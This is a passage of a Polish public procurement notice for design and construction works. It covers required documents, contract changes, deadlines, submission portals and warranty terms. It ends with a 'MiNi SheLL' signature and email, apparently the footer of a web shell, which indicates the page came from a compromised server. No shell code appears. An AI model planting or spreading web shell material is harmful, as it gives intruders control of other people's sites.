się o zamówienia składa odrębnie:<br/>1) „Oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału w<br/>postępowaniu” – aktualne na dzień składania ofert, sporządzone zgodnie ze wzorem<br/>stanowiącym Załącznik nr 4 do SWZ,<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy, oraz w zakresie określonym<br/>w § 13 ust. 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy, sporządzone nie wcześniej niż 3 miesiące przed ich<br/>złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Szczegółowe informacje znajdują się w dokumentach zamówienia na<br/>stroniehttp://www.adm.uz.zgora.pl/przetargi/. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wprowadzenie jakichkolwiek zmian do Umowy możliwe jest tylko w granicach określonych art.<br/>455 obowiązującej ustawy Prawo zamówień publicznych. 2. Wystąpienie którejkolwiek z<br/>wymienionych okoliczności mogących powodować zmianę<br/>Umowy nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania zmian, ani nie<br/>może stanowić podstawy roszczeń Wykonawcy do ich dokonania.<br/>3. Zmiany Umowy dokonane z naruszeniem przepisów art. 454 i 455 ustawy Prawo zamówień<br/>publicznych podlegają unieważnieniu. W takim przypadku stosuje się postanowienia umowne w<br/>brzmieniu obowiązującym przed ta zmianą. Szczegółowe informacje znajdują się w dokumentach zamówienia na<br/>stroniehttp://www.adm.uz.zgora.pl/przetargi/. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/; https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Jeśli w ofercie Wykonawcy będą znajdowały się dokumenty zawierające wartości<br/>przedstawione w walutach obcych podczas oceny takich ofert Zamawiający będzie przeliczał<br/>waluty obce na złote (PLN) wg średniego kursu Narodowego Banku Polskiego danej waluty z<br/>dnia zamieszczenia ogłoszenia o przedmiotowym zamówieniu w Biuletynie Zamówień<br/>Publicznych.<br/>2. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej,<br/>podpisanej kwalifikowanym podpisem elektronicznym przez osobę upoważnioną do<br/>reprezentowania Wykonawcy ) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym osoby upoważnionej do reprezentowania Wykonawcy.<br/>3. Złożona przez Wykonawcę oferta musi zawierać następujące dokumenty:<br/>1)	wypełniony formularz OFERTA – załącznik nr 2 do SWZ;<br/>2)	oświadczenia, o których mowa w Rozdziale XII pkt 1 ppkt 1 i pkt 3 ppkt 1 SWZ – załącznik nr 4 do SWZ;<br/>3)	dokument, o którym mowa w pkt. XII. pkt. 19 SWZ; odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania;<br/>4)	wymagane przez Zamawiającego w Rozdziale XII pkt 2 SWZ Przedmiotowe Środki dowodowe: jeśli dotyczy .<br/>5)	jeżeli prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą, należy dołączyć do oferty stosowne pełnomocnictwo;<br/>6)	jeśli Wykonawca zastrzegł w ofercie, że jakieś informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, do oferty musi dołączyć wypełniony formularz Wykazanie zasadności zastrzeżenia informacji jako tajemnicy przedsiębiorstwa, załącznik nr 5 do SWZ, i musi dołączyć załączniki konieczne dla wykazania zasadności zastrzeżenia.<br/>4. Rozpoczęcie wykonania zamówienia:<br/>1)	rozpoczęcie wykonania prac projektowych – z dniem zawarcia Umowy;<br/>2)	rozpoczęcie wykonania robót budowlanych – po odbiorze przez Zamawiającego dokumentacji projektowej i po uzyskaniu ostatecznej lub – w przypadku wniesienia skargi do sądu administracyjnego - prawomocnej decyzji o pozwoleniu na budowę lub po upływie terminu do wniesienia przez organa administracji architektoniczno-budowlanej sprzeciwu wobec zgłoszenia rozpoczęcia robót budowlanych nie wymagających pozwolenia, w zależności od potrzeby – o ile jest wymagane. Zamawiający dopuszcza rozpoczęcie robót przygotowawczych, demontażowych i rozbiórkowych z dniem zawarcia umowy, przed opracowaniem i odbiorem dokumentacji projektowej.<br/>3) Zakończenie wykonania całości zamówienia tj. wykonania prac projektowych i robót budowlanych i uzyskanie pozwolenia lub innych decyzji potwierdzających możliwość użytkowania przedmiotu zamówienia, w zależności od potrzeby: w ciągu maksymalnie 75 dni od daty zawarcia umowy.<br/>5.	Gwarancja/rękojmia:<br/>Wykonawca zobowiązany jest udzielić Zamawiającemu na przedmiot zamówienia gwarancji jakości/rękojmi na okres 60 miesięcy.<br/>Szczegółowe informacje znajdują się w dokumentach zamówienia na stronie<br/>http://www.adm.uz.zgora.pl/przetargi/.

Creat By MiNi SheLL
Email: jattceo@gmail.com